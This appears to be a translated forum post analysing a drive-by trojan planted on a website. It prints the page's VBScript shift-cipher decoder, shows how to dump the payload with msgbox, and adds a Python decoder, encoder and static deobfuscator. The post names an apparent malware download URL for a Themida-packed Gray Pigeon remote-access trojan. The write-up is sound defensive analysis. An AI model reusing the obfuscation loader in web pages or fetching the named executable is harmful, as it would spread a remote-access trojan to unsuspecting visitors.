Today a friend visited a site and found it had been planted with a drive-by trojan, so he asked me to find the trojan's download address.
I pulled the web trojan down and took a look: it uses a decoding function the author wrote himself.
=================================
<script language=vbscript>
Above is a sea of "琳"!
function unencode(temp) ' the decoding function he wrote himself
but=14
for i = 1 to len(temp)
  if mid(temp,i,1) <> "琳" then
    if asc(mid(temp,i,1)) < 32 or asc(mid(temp,i,1)) > 126 then
      a = a & chr(asc(mid(temp,i,1)))   ' outside printable ASCII: pass through unchanged
    else
      pk = asc(mid(temp,i,1)) - but     ' shift each printable character back by 14 ...
      if pk > 126 then
        pk = pk - 95
      elseif pk < 32 then
        pk = pk + 95                    ' ... wrapping around inside 32..126
      end if
      a = a & chr(pk)
    end if
  else
    a = a & vbcrlf                      ' every "琳" stands for a line break
  end if
next
unencode = a
end function ' the algorithm isn't hard; for time reasons I won't analyze it.
document.write(unencode(hu))          ' hu holds the encoded payload string
</script>
==================================================
Decoding
Seeing the final document.write(unencode(hu)),
we change it to msgbox (unencode(hu)) and it dumps itself out.
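As an added illustration (my code, not from the original post): a Python port of the unencode() function above, the inverse transform (my assumption, used only to build a constructed, benign test vector), and a static variant that pulls the hu string and the but constant out of the script text, so an analyst can decode the payload without executing the script the way the msgbox trick does.

```python
import re

SEP = "琳"           # the script writes CR/LF whenever it meets this character
SHIFT = 14           # the script's `but` constant
LO, HI = 32, 126     # the printable-ASCII window the shift wraps inside
SPAN = HI - LO + 1   # 95

def unencode(temp: str, but: int = SHIFT) -> str:
    """Port of the script's unencode(): subtract `but` from every printable
    ASCII character, wrapping back into 32..126; SEP becomes CR/LF; anything
    outside the window passes through unchanged."""
    out = []
    for ch in temp:
        if ch == SEP:
            out.append("\r\n")
            continue
        code = ord(ch)
        if code < LO or code > HI:
            out.append(ch)
            continue
        pk = code - but
        if pk > HI:          # kept from the original; unreachable for but > 0
            pk -= SPAN
        elif pk < LO:
            pk += SPAN
        out.append(chr(pk))
    return "".join(out)

def encode(plain: str, but: int = SHIFT) -> str:
    """Inverse of unencode() (my assumption; the page shows only the decoder),
    used here to build a known-answer test vector."""
    out = []
    for ch in plain:
        if ch == "\n":
            out.append(SEP)
        elif LO <= ord(ch) <= HI:
            out.append(chr((ord(ch) - LO + but) % SPAN + LO))
        else:
            out.append(ch)
    return "".join(out)

def deobfuscate_script(script: str) -> str:
    """Static alternative to the msgbox trick: extract hu="..." and but=N from
    the VBScript text and decode without running it. A doubled quote inside a
    VBScript string literal stands for one quote."""
    m_hu = re.search(r'hu\s*=\s*"((?:[^"]|"")*)"', script)
    m_but = re.search(r'^\s*but\s*=\s*(\d+)', script, re.M)
    if not (m_hu and m_but):
        raise ValueError('no hu="..." / but=N pair found')
    return unencode(m_hu.group(1).replace('""', '"'), int(m_but.group(1)))

# Constructed, benign sample (not the page's payload): plain text re-encoded
# with the same scheme and wrapped in a script shaped like the one above.
SAMPLE_PLAIN = '<html><body>\nhello sir, "quoted"\n</body></html>'
SAMPLE_SCRIPT = ('<script language=vbscript>\nhu="'
                 + encode(SAMPLE_PLAIN).replace('"', '""')
                 + '"\nfunction unencode(temp)\nbut=14\nend function\n'
                 'document.write(unencode(hu))\n</script>')
```

Running deobfuscate_script(SAMPLE_SCRIPT) returns SAMPLE_PLAIN with each newline restored as CR/LF, which is exactly what the msgbox would have shown.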
====================================
Run the modified version;
the result is shown in the figure.
Heh, the trojan address is www.ztwgw.com/123/ss.exe
Downloading it, I found it is a Themida-protected 黑防 (Hacker Defence) edition of Gray Pigeon (灰鸽子).
==============================
Script encryption, cracked just like that with a single line.